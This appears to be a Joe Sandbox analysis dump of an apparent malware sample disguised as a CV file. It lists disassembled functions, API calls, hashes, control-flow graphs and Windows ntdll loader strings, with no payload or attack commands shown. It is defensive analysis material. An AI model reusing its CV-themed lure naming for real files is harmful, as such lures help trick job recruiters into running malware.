                                    • Opcode Fuzzy Hash: 0f887f0a3e3920cd4c843b2e04dfde9492f7527f20624846d296453d98ef8ddf
                                    • Instruction Fuzzy Hash: 52018472D0021C7ADB10AAE59C81DEF7B7CDF41798F448069FA18A7241D7785F068BB5
                                    Function 0041786E Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 88 41786e-41786f 89 417871-41787f 88->89 90 417896-417897 88->90 89->90 91 417899-4178a8 90->91 92 4178a9-4178aa 91->92 93 417841-417843 92->93 94 4178ac-4178c4 92->94 96 417849-417851 93->96 97 417844 call 42c903 93->97 95 4178c6-4178cf 94->95 94->96 101 4178d1-4178dc 95->101 102 41790d-41791e 95->102 99 417853-417867 LdrLoadDll 96->99 100 41786a-41786d 96->100 97->96 99->100 101->91 103 4178de-4178ea 101->103 102->92 104 417920-417927 102->104
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cdbb073212cc2a369da66f7c783e2ca650cd8513bdb17ed23c4ebdca57cd041
                                    • Instruction ID: 3123b07cfd2fc18993a911716eaa7c29f46a54d1c2713f17eb7a6b3dcb8adfd0
                                    • Opcode Fuzzy Hash: 7cdbb073212cc2a369da66f7c783e2ca650cd8513bdb17ed23c4ebdca57cd041
                                    • Instruction Fuzzy Hash: A6219BB1514503ABDF11DE29D886BDBB7B8FB51B00F50812AE4188B202E330A5D1CF94
                                    Function 0042B653 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 120 42b653-42b697 call 4047d3 call 42c403 RtlAllocateHeap
                                    APIs
                                    • RtlAllocateHeap.NTDLL(?,0041DFE8,?,?,00000000,?,0041DFE8,?,?,?), ref: 0042B692
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction ID: d7a6c4062cda643776f7fe05e877272c74983f0035480fc5f1196f7f2b85d0b5
                                    • Opcode Fuzzy Hash: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction Fuzzy Hash: E1E06D752042057BC614EE99EC81EAB77ACEFC9714F00041AF908A7241D770B91186B9
                                    Function 0042B6A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 125 42b6a3-42b6e4 call 4047d3 call 42c403 RtlFreeHeap
                                    APIs
                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1A5FE856,00000007,00000000,00000004,00000000,004170CE,000000F4,?,?,?,?,?), ref: 0042B6DF
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: d665bb28e766b405ad5b769d439b243b610f19b16aa710fa6b14fc68fb677987
                                    • Instruction ID: 9ea3a1a2113b7c7649c30291b65c70b866589131945228eff7c5988ceee78d48
                                    • Opcode Fuzzy Hash: d665bb28e766b405ad5b769d439b243b610f19b16aa710fa6b14fc68fb677987
                                    • Instruction Fuzzy Hash: 99E06D762443047BD614EE59EC41FAB77ACEFC9714F00441AFA08A7242D674B91487B9
                                    Function 0042B6F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 135 42b6f3-42b72f call 4047d3 call 42c403 ExitProcess
                                    APIs
                                    • ExitProcess.KERNEL32(?,00000000,?,?,D79DDBBC,?,?,D79DDBBC), ref: 0042B72A
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 120c72880c48e41469a1839271b46d956abbe7acede0f73cb3ae634478dde74c
                                    • Instruction ID: 362e2f82938af53dbda641d70c59adf29450de053aa80bfa5242064133eb8aa4
                                    • Opcode Fuzzy Hash: 120c72880c48e41469a1839271b46d956abbe7acede0f73cb3ae634478dde74c
                                    • Instruction Fuzzy Hash: 68E04F712042147BD610EA5ADC81F9B776CDFC5714F40401AFA08B7541D774791187E5
                                    Function 01532C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 140 1532c0a-1532c0f 141 1532c11-1532c18 140->141 142 1532c1f-1532c26 LdrInitializeThunk 140->142
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                    • Instruction ID: 950850ffdf38b190c5dfd0f4be7f84e7c196f48cdbb7c6a26ccfb9177d7bf208
                                    • Opcode Fuzzy Hash: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                    • Instruction Fuzzy Hash: 29B09B719019C5D6DA11F7A5460871B7A5077D0715F19C461D2030B41F4778D1D1E275

                                    Non-executed Functions

                                    Function 01572349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-2160512332
                                    • Opcode ID: 882974b026ba65eed8204ea77ef29e00c5e1ce804414c370fdf9046a918ed953
                                    • Instruction ID: 6e68320fd983d58e9903f24fc15b2c07c439839ec4e431798d3084df947fc03f
                                    • Opcode Fuzzy Hash: 882974b026ba65eed8204ea77ef29e00c5e1ce804414c370fdf9046a918ed953
                                    • Instruction Fuzzy Hash: 05929D71608342AFE725DF29D882F6BB7E8BB84714F04481DFA94DB250D770E844CB92
                                    Function 01528620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                    Download Yara Rule
                                    Strings
                                    • corrupted critical section, xrefs: 015654C2
                                    • Critical section debug info address, xrefs: 0156541F, 0156552E
                                    • Address of the debug info found in the active list., xrefs: 015654AE, 015654FA
                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01565543
                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0156540A, 01565496, 01565519
                                    • Critical section address., xrefs: 01565502
                                    • double initialized or corrupted critical section, xrefs: 01565508
                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654E2
                                    • undeleted critical section in freed memory, xrefs: 0156542B
                                    • 8, xrefs: 015652E3
                                    • Invalid debug info address of this critical section, xrefs: 015654B6
                                    • Thread identifier, xrefs: 0156553A
                                    • Critical section address, xrefs: 01565425, 015654BC, 01565534
                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654CE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                    • API String ID: 0-2368682639
                                    • Opcode ID: a166b5d62e7c3c4e4e89bb480633bf90918acb5c847abafa6aae90941448e3e4
                                    • Instruction ID: d8fc6dfed7153839cf9e367cad1b0fb1a988e5123448c9d367801049530637d8
                                    • Opcode Fuzzy Hash: a166b5d62e7c3c4e4e89bb480633bf90918acb5c847abafa6aae90941448e3e4
                                    • Instruction Fuzzy Hash: 20817E71A40359AFDF20CF9AC845FAEBBF9BB58714F20411AF504BB250E771A945CB90
                                    Function 015229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                    Download Yara Rule
                                    Strings
                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01562412
                                    • @, xrefs: 0156259B
                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01562602
                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01562624
                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01562498
                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01562409
                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015622E4
                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015625EB
                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0156261F
                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01562506
                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015624C0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                    • API String ID: 0-4009184096
                                    • Opcode ID: 691d3394aee3b7c2d8e204f7fd5a22870b9224d5fd5133203ac16017acc419b8
                                    • Instruction ID: eaf25451d330099ff27a936830b6851a4c3eda6c3aa8ff9c5f8ad2dcccf381a7
                                    • Opcode Fuzzy Hash: 691d3394aee3b7c2d8e204f7fd5a22870b9224d5fd5133203ac16017acc419b8
                                    • Instruction Fuzzy Hash: 5D0251B6D002299BDB31DB54CC80B9DB7B8BB55314F4045DAE649BB281DB309E84CF99
                                    Function 01598B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                    • API String ID: 0-2515994595
                                    • Opcode ID: bc7c4fc08bf797095c8b3d5a7c2a5f9b2430b27de1502132739685ef460cb548
                                    • Instruction ID: 5b6c6271b03a60ac60861e65f2dd9f00a44438fdbf0c24300fccc5ab4801970e
                                    • Opcode Fuzzy Hash: bc7c4fc08bf797095c8b3d5a7c2a5f9b2430b27de1502132739685ef460cb548
                                    • Instruction Fuzzy Hash: 0851017150434A9BDB29CF18C944BABBBE8FFD6640F14491EEA58CB250E770D504CBA3
                                    Function 015A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                    • API String ID: 0-1700792311
                                    • Opcode ID: ec16c06ee6e6e95e109701b2af4926f09dff8cd04733fa54b1981c974936cbc3
                                    • Instruction ID: 5fe7eb7d5c2ca3ddc3b64df624d99d12db0a53eb986e05395f78578342497f8b
                                    • Opcode Fuzzy Hash: ec16c06ee6e6e95e109701b2af4926f09dff8cd04733fa54b1981c974936cbc3
                                    • Instruction Fuzzy Hash: 29D1ED35A90286DFDB26DF69C444AADBBF1FF5A704F58804EE4859F2A2C734E841CB50
                                    Function 015789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                    Download Yara Rule
                                    Strings
                                    • VerifierFlags, xrefs: 01578C50
                                    • VerifierDebug, xrefs: 01578CA5
                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01578A3D
                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01578A67
                                    • VerifierDlls, xrefs: 01578CBD
                                    • HandleTraces, xrefs: 01578C8F
                                    • AVRF: -*- final list of providers -*- , xrefs: 01578B8F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                    • API String ID: 0-3223716464
                                    • Opcode ID: 6633e88cf6eccf712ac569b34304440477b81b1b29813917c93f87631c4ff6cb
                                    • Instruction ID: fbd67f53004503f22e648f7bb69b4cb955e023ac42a8abe4f9ab5602af7d81e3
                                    • Opcode Fuzzy Hash: 6633e88cf6eccf712ac569b34304440477b81b1b29813917c93f87631c4ff6cb
                                    • Instruction Fuzzy Hash: CC914872A00712DFD726DF68E88AF1A7BE8BB94724F45095DFA446F250D7709C04CBA1
                                    Function 014FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                    • API String ID: 0-1109411897
                                    • Opcode ID: f5d64e0444c486dabbaa87d83e47337781edda8ae9dd0e412d8b5c018e9b119a
                                    • Instruction ID: 9b3de9564734f855619fad138bd957d60b651492a95635dd9657c484b6329d91
                                    • Opcode Fuzzy Hash: f5d64e0444c486dabbaa87d83e47337781edda8ae9dd0e412d8b5c018e9b119a
                                    • Instruction Fuzzy Hash: 56A23B75A0562A8FDB64CF19C9987ADBBB5BF45304F1442DAD909AB360EB309EC5CF00
                                    Function 015263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-792281065
                                    • Opcode ID: 67580253896e24c98f7fe8a73a9c2993008e418acbfcefabc549ec04b5b51908
                                    • Instruction ID: 3b91a884c70be5615763e3a5291d88e977f53317edeb785d2662dceb585fce57
                                    • Opcode Fuzzy Hash: 67580253896e24c98f7fe8a73a9c2993008e418acbfcefabc549ec04b5b51908
                                    • Instruction Fuzzy Hash: F5910131F002269BEB39DF58D889BAE7BE5BB91B24F210129E9506F2D1D7B09841C7D1
                                    Function 014E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                    Download Yara Rule
                                    Strings
                                    • LdrpInitShimEngine, xrefs: 015499F4, 01549A07, 01549A30
                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01549A2A
                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01549A01
                                    • minkernel\ntdll\ldrinit.c, xrefs: 01549A11, 01549A3A
                                    • apphelp.dll, xrefs: 014E6496
                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015499ED
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-204845295
                                    • Opcode ID: 6f9b10830b29add1804b4cac3a5ca52dc543f19aed7d5dbc17e02ea635cad86f
                                    • Instruction ID: 7e4e98eb65e22e85823c87876d70cb8f9608ebdfb9aa3fcbad8a7899f5002913
                                    • Opcode Fuzzy Hash: 6f9b10830b29add1804b4cac3a5ca52dc543f19aed7d5dbc17e02ea635cad86f
                                    • Instruction Fuzzy Hash: 75511F712083019FEB24DF25D846FAB77E8FB98648F01091EF5959F2A0D7B0E904CB92
                                    Function 01522674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                    Download Yara Rule
                                    Strings
                                    • RtlGetAssemblyStorageRoot, xrefs: 01562160, 0156219A, 015621BA
                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01562180
                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01562178
                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015621BF
                                    • SXS: %s() passed the empty activation context, xrefs: 01562165
                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0156219F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                    • API String ID: 0-861424205
                                    • Opcode ID: 41fb48b649f36f91646df1fa511d36a1732d0379db5a5a38bf5ee4044fef2b48
                                    • Instruction ID: 61c75a924a274c65296cfdad8e6300e38f896dd8f791ee6442ca3c179a0dd434
                                    • Opcode Fuzzy Hash: 41fb48b649f36f91646df1fa511d36a1732d0379db5a5a38bf5ee4044fef2b48
                                    • Instruction Fuzzy Hash: 5831093BF44235B7FB21CA998C45F5E7A68FB96A55F09005AFA04BF151D3709A00C6E1
                                    Function 0152C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                    Download Yara Rule
                                    Strings
                                    • LdrpInitializeProcess, xrefs: 0152C6C4
                                    • minkernel\ntdll\ldrinit.c, xrefs: 0152C6C3
                                    • LdrpInitializeImportRedirection, xrefs: 01568177, 015681EB
                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 015681E5
                                    • Loading import redirection DLL: '%wZ', xrefs: 01568170
                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01568181, 015681F5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                    • API String ID: 0-475462383
                                    • Opcode ID: b6b02b8fdbd786794a73aa2292d44b9a53e2c43078186b7e2a0e7282dca5bb04
                                    • Instruction ID: 72ebe5050261824a797f0743c8e7536d44833b7f17a05385c31863283130547f
                                    • Opcode Fuzzy Hash: b6b02b8fdbd786794a73aa2292d44b9a53e2c43078186b7e2a0e7282dca5bb04
                                    • Instruction Fuzzy Hash: 8831E0B26443179BD224EF28D946E1EBBD4FFD5B10F010958F984AF2A1E670ED04C7A2
                                    Function 0153096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 01532DF0: LdrInitializeThunk.NTDLL ref: 01532DFA
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BA3
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BB6
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D60
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D74
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                    • String ID:
                                    • API String ID: 1404860816-0
                                    • Opcode ID: b3287a3d41d42e40823907ccc257e9c0aeec62e340528e48eb76ec8a229a04a6
                                    • Instruction ID: 174b105e1c772a6cfd7c21d39d0cda6b35a2b50ef4082a5a8f6f4fa3702b29b3
                                    • Opcode Fuzzy Hash: b3287a3d41d42e40823907ccc257e9c0aeec62e340528e48eb76ec8a229a04a6
                                    • Instruction Fuzzy Hash: E2424C75900716DFDB21CF68C880BAAB7F9BF84314F1445A9E989DF241D770AA85CFA0
                                    Function 014FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                    • API String ID: 0-379654539
                                    • Opcode ID: fa89f6715ac1c90e4ec999e769fc609dbbfc077ad11df5203ed64bb8fa888eda
                                    • Instruction ID: b2db672f9fb0840c91c01cbd3e0f2624dbac64e5a210b11e09d27ca61876eb2d
                                    • Opcode Fuzzy Hash: fa89f6715ac1c90e4ec999e769fc609dbbfc077ad11df5203ed64bb8fa888eda
                                    • Instruction Fuzzy Hash: 0DC17974108382CFD711CF58C144B6AB7E4BF84704F14896EFA9A8B3A1E734D94ACB66
                                    Function 01528402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                    Download Yara Rule
                                    Strings
                                    • LdrpInitializeProcess, xrefs: 01528422
                                    • minkernel\ntdll\ldrinit.c, xrefs: 01528421
                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0152855E
                                    • @, xrefs: 01528591
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-1918872054
                                    • Opcode ID: 440e3fca378cc1ed663d2ba061ffb56bb1ff77299981b39ba3970e729a0f8871
                                    • Instruction ID: 977133fe82bb6ede54b7f38ef01b7d709c5ff131cb4493c4494f04aa072c1be1
                                    • Opcode Fuzzy Hash: 440e3fca378cc1ed663d2ba061ffb56bb1ff77299981b39ba3970e729a0f8871
                                    • Instruction Fuzzy Hash: C1919072658356AFD721DEA5C850E6FBBECBF85784F40092EF6849B191E330D904CB62
                                    Function 0152273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                    Download Yara Rule
                                    Strings
                                    • .Local, xrefs: 015228D8
                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015621D9, 015622B1
                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015622B6
                                    • SXS: %s() passed the empty activation context, xrefs: 015621DE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
